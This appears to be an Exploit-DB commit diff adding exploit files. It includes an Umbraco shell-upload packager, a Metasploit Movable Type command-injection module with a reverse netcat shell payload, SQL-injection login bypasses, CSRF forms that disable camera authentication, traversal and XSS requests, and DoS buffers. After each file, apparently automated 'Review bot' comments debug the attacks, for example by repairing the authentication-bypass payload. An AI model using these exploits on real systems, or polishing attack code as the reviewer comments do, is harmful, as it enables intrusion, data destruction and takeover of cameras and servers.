DB: 2021-10-30

95 changes to exploits/shellcodes

Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
Sandboxie 5.49.7 - Denial of Service (PoC)
WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
iDailyDiary 4.30 - Denial of Service (PoC)
RarmaRadio 2.72.8 - Denial of Service (PoC)
DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
Color Notes 1.4 - Denial of Service (PoC)
Macaron Notes great notebook 5.5 - Denial of Service (PoC)
My Notes Safe 5.3 - Denial of Service (PoC)

n+otes 1.6.2 - Denial of Service (PoC)

Telegram Desktop 2.9.2 - Denial of Service (PoC)

Mini-XML 3.2 - Heap Overflow
Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)
Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)
Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)
Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)

MariaDB 10.2 - 'wsrep_provider' OS Command Execution

Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free

Visual Studio Code 1.47.1 - Denial of Service (PoC)

DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)

MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)

Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)

GNU Wget < 1.18 - Arbitrary File Upload (2)

WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)

E-Learning System 1.0 - Authentication Bypass

PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting

GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting

EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting

Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated)

Library System 1.0 - Authentication Bypass

Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting

Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)

GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery

GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit)

Umbraco v8.14.1 - 'baseUrl' SSRF

Cacti 1.2.12 - 'filter' SQL Injection

GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery

Internship Portal Management System 1.0 - Remote Code Execution (Unauthenticated)
Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting
Xmind 2020 - Persistent Cross-Site Scripting
Tagstoo 2.0.1 - Persistent Cross-Site Scripting
SnipCommand 0.1.0 - Persistent Cross-Site Scripting
Moeditor 0.2.0 - Persistent Cross-Site Scripting
Marky 0.0.1 - Persistent Cross-Site Scripting
StudyMD 0.3.2 - Persistent Cross-Site Scripting
Freeter 1.2.1 - Persistent Cross-Site Scripting
Markright 1.0 - Persistent Cross-Site Scripting
Markdownify 1.2.0 - Persistent Cross-Site Scripting
Anote 1.0 - Persistent Cross-Site Scripting
Subrion CMS 4.2.1 - Arbitrary File Upload
Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection

Schlix CMS 2.2.6-6 - Arbitrary File Upload (Authenticated)

Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)

CHIYU IoT Devices - Denial of Service (DoS)

Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated)

TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)

WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal

Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)

Scratch Desktop 3.17 - Remote Code Execution

Church Management System 1.0 - Arbitrary File Upload (Authenticated)

Phone Shop Sales Managements System 1.0 - Arbitrary File Upload

Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS)

WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting

ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)

KevinLAB BEMS 1.0 - Authentication Bypass

Event Registration System with QR Code 1.0 - Authentication Bypass

CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF)

Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password)

qdPM 9.2 - Password Exposure (Unauthenticated)
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)
Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit)

GeoVision Geowebserver 5.3.3 - Local File Inclusion

Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated)

Umbraco CMS 8.9.1 - Directory Traversal

Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Dolibarr ERP 14.0.1 - Privilege Escalation

Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS)

Drupal Module MiniorangeSAML 8.x-2.22 - Privilege Escalation

Phpwcms 1.9.30 - Arbitrary File Upload

Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)
Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)
Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)
Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)
Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
This commit is contained in:
Offensive Security 2021-10-30 05:02:09 +00:00
parent f33a724e0b
commit de260aeac6
97 changed files with 9430 additions and 0 deletions

exploits/aspx/webapps/50241.py Executable file

@ -0,0 +1,72 @@
# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
# Exploit Author: BitTheByte
# Description: Authenticated path traversal vulnerability.
# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
# Vendor Homepage: https://umbraco.com/
# Version: <= 8.9.1
# CVE : CVE-2020-5811
import string
import random
import argparse
import zipfile
import os
package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
<umbPackage>
<files>
<file>
<guid>{(unknown)}</guid>
<orgPath>{{upload_path}}</orgPath>
<orgName>{(unknown)}</orgName>
</file>
</files>
<info>
<package>
<name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
<version>1.0.0</version>
<iconUrl></iconUrl>
<license url="http://opensource.org/licenses/MIT">MIT License</license>
<url>https://example.com</url>
<requirements>
<major>0</major>
<minor>0</minor>
<patch>0</patch>
</requirements>
</package>
<author>
<name>CVE-2020-5811</name>
<website>https://example.com</website>
</author>
<contributors>
<contributor></contributor>
</contributors>
<readme><![CDATA[]]></readme>
</info>
<DocumentTypes />
<Templates />
<Stylesheets />
<Macros />
<DictionaryItems />
<Languages />
<DataTypes />
<Actions />
</umbPackage>
"""
parser = argparse.ArgumentParser(description='CVE-2020-5811')
parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
args = parser.parse_args()
if not os.path.isfile(args.shell):
print("[ERROR] please use a correct path for the shell file.")
output_file = "exploit.zip"
package = zipfile.ZipFile(output_file, 'w')
package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
package.close()
print(f"[DONE] Created Umbraco package: {output_file}")
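Review bot: a bad `--shell` path is reported but not acted on: the line `print("[ERROR] please use a correct path for the shell file.")` is not followed by `sys.exit(1)`, so the script falls through to `open(args.shell, 'r')` and dies with a traceback; add the exit and `import sys`. On the same hunk, the `package_xml` f-string contains `{(unknown)}` where the `guid` and `orgName` placeholders belong, which as written is a NameError at import time; the later `package_xml.format(filename=..., upload_path=...)` call expects a doubled-brace `{{filename}}` placeholder there, matching `{{upload_path}}`. The shell is also read in text mode, which mangles binary payloads and fails on non-UTF-8 bytes; use `'rb'`, since `writestr` accepts bytes. Finally, the header calls this an authenticated path traversal and file write, but the script only produces `exploit.zip` and never says how it is delivered to the target, so a one-line usage note is needed for the PoC to be reproducible.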


@ -0,0 +1,28 @@
# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF
# Date: July 5, 2021
# Exploit Author: NgoAnhDuc
# Vendor Homepage: https://our.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases/8141
# Version: v8.14.1
# Affect: Umbraco CMS v8.14.1, Umbraco Cloud
Vulnerable code:
Umbraco.Web.Editors.HelpController.GetContextHelpForPage():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50
Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss():
https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91
PoC:
/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=
https://SSRF-HOST.EXAMPLE/
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/
Notes:
- There's no "/" suffix in payload 1
- "/" suffix is required in payload 2 and payload 3
- "section" parameter value must be changed each exploit attempt
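Review bot: the second PoC URL is wrapped across two lines, so its `baseUrl=` value `https://SSRF-HOST.EXAMPLE/` is detached from the request line; join them, because the notes that follow hinge on the exact trailing slash. The advisory also never states the access level needed: all three endpoints live under `/umbraco/backoffice/`, and nothing here says whether an unauthenticated request reaches them, so record the tested privilege. The note that `section` must change per attempt is explained only implicitly by the `TryToAvoidGetCacheItem` value; say outright that the response is cached per section.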

exploits/cgi/webapps/50464.rb Executable file

@ -0,0 +1,112 @@
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Movable Type XMLRPC API Remote Command Injection",
'Description' => %q{
This module exploit Movable Type XMLRPC API Remote Command Injection.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Etienne Gervais', # author & msf module,
'Charl-Alexandre Le Brun' # author & msf module
],
'References' =>
[
['CVE', '2021-20837'],
['URL', 'https://movabletype.org/'],
['URL', 'https://nemesis.sh/']
],
'DefaultOptions' =>
{
'SSL' => false,
},
'Platform' => ['linux'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'DisclosureDate' => "2021-10-20",
'DefaultTarget' => 0,
'Targets' => [
[
'Automatic (Unix In-Memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
}
]
]
))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of the MovableType', '/cgi-bin/mt/'])
], self.class
)
end
def cmd_to_xml(cmd, opts={})
base64_cmd = Rex::Text.encode_base64("`"+cmd+"`")
xml_body = <<~THISSTRING
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
#{base64_cmd}
</base64>
</value>
</param>
</params>
</methodCall>
THISSTRING
end
def check
begin
fingerprint = Rex::Text.rand_text_alpha(32)
command_payload = cmd_to_xml("echo "+fingerprint)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'),
'ctype' => 'text/xml; charset=UTF-8',
'data' => command_payload
})
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200
if res && res.body.include?("Can't locate "+fingerprint)
return Exploit::CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
Exploit::CheckCode::Safe
end
def exploit
begin
command_payload = cmd_to_xml(payload.raw)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'),
'ctype' => 'text/xml; charset=UTF-8',
'data' => command_payload
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
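Review bot: `check` calls `fail_with` on a nil response and on a non-200 status, which aborts the module instead of returning a check result; a `check` method should return `Exploit::CheckCode::Unknown` in those cases and leave `fail_with` to `exploit`. In `exploit`, `res` is assigned but never inspected, so a nil or 4xx/5xx reply is silently ignored; at least `fail_with(Failure::UnexpectedReply, ...)` on `res.nil?` as `check` already does. Minor: `'Arch' => ARCH_CMD` is declared both at the top level and inside the target, `register_options(..., self.class)` uses the deprecated two-argument form, and `cmd_to_xml` relies on the heredoc being the implicit return value while the `xml_body` variable it assigns is otherwise unused.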


@ -0,0 +1,67 @@
# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)
# Date: 07.11.2020
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.selea.com
Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure
Vendor: Selea s.r.l.
Product web page: https://www.selea.com
Affected version: Model: iZero
Targa 512
Targa 504
Targa Semplice
Targa 704 TKM
Targa 805
Targa 710 INOX
Targa 750
Targa 704 ILB
Firmware: BLD201113005214
BLD201106163745
BLD200304170901
BLD200304170514
BLD200303143345
BLD191118145435
BLD191021180140
BLD191021180140
CPS: 4.013(201105)
3.100(200225)
3.005(191206)
3.005(191112)
Summary: IP camera with optical character recognition (OCR) software for automatic
number plate recognition (ANPR) also equipped with ADR system that enables it to read
the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
this camera suitable for all installation conditions. Its built-in OCR software works
as an automatic and independent system without the need of a computer, thus giving
autonomy to the device even in the event of an interruption in the connection between
the camera and the operations centre.
Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream
disclosure when p1.mjpg or p1.264 is called.
Tested on: GNU/Linux 3.10.53 (armv7l)
PHP/5.6.22
selea_httpd
HttpServer/0.1
SeleaCPSHttpServer/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5619
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
07.11.2020
--
Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264
Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg
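Review bot: `BLD191021180140` is listed twice in the Firmware block; drop the duplicate or substitute the build that was meant. The PoC consists of the two stream URLs against a lab address, which does not by itself show that no credentials are involved; state that the requests were sent without any `Authorization` header (for example `curl -sI http://192.168.1.17/p1.mjpg` returning 200), so a reader can separate this from a camera that merely ships with default credentials.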


@ -0,0 +1,47 @@
# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021
# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
# CVE: CVE-2021-31642
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.
CVE ID: CVE-2021-31642
CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642
Affected parameter: page=Component: if.cgi
Payload:
if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
====HTTP request======
GET
/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/AccLog.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to the CGI component (if.cgi)
3. Append the payload at the end of the vulnerable parameter (page)
4. Submit the request and observe payload execution
Mitigation: The latest version of the CHIYU firmware should be installed
to mitigate this vulnerability.
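Review bot: the description says the crash needs an integer of more than 32 bits, but the payload value `page=2781000` fits easily in a signed 32-bit integer, so either the threshold or the payload is misstated; give the value that actually triggers the fault. The request carries `Authorization: Basic YWRtaW46YWRtaW4=` (admin:admin), consistent with the CVSS `PR:L`, so the reproduction steps should say a valid login is required. Also, `Affected parameter: page=Component: if.cgi` runs two fields together, and the request line is wrapped over three lines; put it on one line so it can be copied as-is.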


@ -0,0 +1,62 @@
# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com
Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)
Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficient of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.
Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
mechanism.
Tested on: Linux CentOS 7
Apache 2.4.6
Python 2.7.5
PHP 5.4.16
MariaDB 5.5.68
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5655
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
05.07.2021
--
PoC POST data payload (extract):
--------------------------------
POST /http/index.php HTTP/1.1
Host: 192.168.1.3
requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
PoC POST data payload (authbypass):
-----------------------------------
POST /http/index.php HTTP/1.1
Host: 192.168.1.3
requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
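Review bot: the authbypass payload is malformed JSON: `"value":"USERNAME' or 1=1--}` is missing the closing double quote before `}`, so the `params` array will not parse as shown. It should read `"value":"USERNAME' or 1=1-- "}`, keeping a space after `--` since MariaDB (the tested backend) only treats `-- ` followed by whitespace as a comment. The extract payload above shows the well-formed shape to mirror.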


@ -0,0 +1,79 @@
# Exploit Title: Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF
# Date: 13.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.panasonic.com
<!--
Panasonic Sanyo CCTV Network Camera 2.03-0x CSRF Disable Authentication / Change Password
Vendor: Panasonic Corporation | SANYO Electric Co., Ltd.
Product web page: https://www.panasonic.com
https://www.sanyo-av.com
https://panasonic.net/sanyo/cs/index.html
Affected version: Model: VCC-HD5600P, FrmVer: 2.03-06 (110315-00), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3300P, FrmVer: 2.03-08 (111222-00), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3300P, FrmVer: 1.02-05 (101005-07), SubVer: 1.01-00 (100528-00)
Model: VCC-HD3300, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
Model: VDC-HD3100P, FrmVer: 2.03-00 (110204-02), SubVer: 1.01-00 (100528-00)
Model: VCC-HD2100P, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
Summary: SANYO network camera and network optional board with the
latest H.264 compression technology provide the optimum surveillance
applications with high quality real time moving image at low bandwidth.
Simultaneous stream of H.264 and JPEG data and also COAX video out
to provide flexible solution for digital and analogue combined system.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. These actions can be exploited to perform authentication
detriment and account password change with administrative privileges if
a logged-in user visits a malicious web site.
Tested on: Embedded Linux
CGI
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5659
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5659.php
13.07.2021
-->
[CSRF]
[Anonymous user log in = ON]
orororororororororororororor
[Change admin password]
<html>
<body>
<form action="http://10.0.0.3:82/cgi-bin/user_registration.cgi" method="POST">
<input type="hidden" name="anonymous_sw" value="1" /> <!--Disable authentication-->
<input type="hidden" name="admin1_pw" value="Ztream0017" /> <!--Change admin password-->
<input type="hidden" name="admin2_pw" value="******" />
<input type="hidden" name="admin3_pw" value="******" />
<input type="hidden" name="operator_pw" value="********" />
<input type="hidden" name="guest_pw" value="*****" />
<input type="submit" value="Push" />
</form>
</body>
</html>
<!--
[Defaults]
admin:admin
admin2:admin2
admin3:admin3
operator:operator
operator2:operator2
guest:guest
-->
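Review bot: the form posts every password field, and the placeholder values `******`, `******`, `********`, `*****` for `admin2_pw`, `admin3_pw`, `operator_pw` and `guest_pw` are not the camera's current passwords, so a victim visiting this page would either have those accounts reset to literal asterisks or have the whole request rejected, on top of the two intended changes. Either remove the fields that are not being changed or tell the reader to fill them in. The separator `orororororororororororororor` between the two scenario labels reads as a typo for a single `or`.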


@ -0,0 +1,37 @@
# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
# Date: 6-16-21 (Vendor Notified)
# Exploit Author: Ken 's1ngular1ty' Pyle
# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
# Version: <= 5.3.3
# Tested on: Windows 20XX / MULTIPLE
# CVE : https://www.geovision.com.tw/cyber_security.php
GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:
Nested Exploitation of the LFI, XSS, HTML / Browser Injection:
GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1
Absolute exploitation of the LFI:
POST /Visitor/bin/WebStrings.srf?obj_name=win.ini
GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini
Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.
ex. obj_name=INJECTEDHTML / XSS
The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:
ex. /Visitor//%252e(path to target)
These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:
The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.
These attacks were disclosed as part of the IOTVillage Presentation:
https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4
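Review bot: `# CVE :` contains a vendor URL rather than a CVE identifier; if none was assigned, say so. The title and body claim remote code execution, but the vectors shown are a traversal file read (`file=..%2f..%2f...windows/win.ini` and the double-encoded `/Visitor//%252e%252e%252f...` form) plus HTML and script injection through `obj_name`; no request that executes code is given, and `POST /Visitor/bin/WebStrings.srf?obj_name=win.ini` appears without a body or the `file` parameter. Either add the RCE request or narrow the claim to LFI, XSS and host-header injection.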


@ -0,0 +1,16 @@
# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS)
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40378
There is a backdoor prefabricated in the device in this path. Accessing the
file through the browser after logging in will cause the device to delete
all data (including the data of the camera itself).
Payload:Visit this page after logging in
/cgi-bin/support/killps.cgi
please refer to:
https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
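Review bot: the title says Denial of Service, but the description says the CGI deletes all data on the device, which is destructive rather than a crash; warn that reproducing it wipes the camera, and say whether anything is recoverable afterwards. The text also says the page is reached "after logging in", so this is an authenticated issue; state which role is needed, since whether any logged-in user can call `/cgi-bin/support/killps.cgi` is the detail that determines severity.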

exploits/ios/dos/49883.py Executable file

@ -0,0 +1,23 @@
# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)
# Author: Luis Martinez
# Discovery Date: 2021-05-18
# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887
# Software Link: App Store for iOS devices
# Tested Version: 14.16.10
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 14.5.1
# Steps to Produce the Crash:
# 1.- Run python code: WebSSH_for_iOS_14.16.10.py
# 2.- Copy content to clipboard
# 3.- Open "WebSSH for iOS"
# 4.- Click -> Tools
# 5.- Click -> mashREPL
# 6.- Paste ClipBoard on "mashREPL>"
# 7.- Intro
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 300
print (buffer)
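Review bot: the `#!/usr/bin/env python` shebang sits after the header comments instead of on line 1, so the file is not directly executable the way step 1 (`Run python code: WebSSH_for_iOS_14.16.10.py`) implies; move it to the first line. Step 7, `Intro`, presumably means pressing Enter; say so. The buffer is only 300 bytes of `A`, which is small for a crash, so a sentence on what the app does with the input (for example why this length matters) would help.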

exploits/ios/dos/49952.py Executable file

@ -0,0 +1,35 @@
# Exploit Title: Color Notes 1.4 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136
# Version: 1.4
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
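Review bot: the bare `except:` swallows the actual reason the file could not be written (permissions, disk full, a read-only working directory) and prints only `File cannot be created`; catch `OSError as e` and include it in the message. The payload is 350,000 bytes and the steps say to paste it twice, so the effective input is about 700 KB; state that in the Vulnerability line, since the file size alone understates what the app receives.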

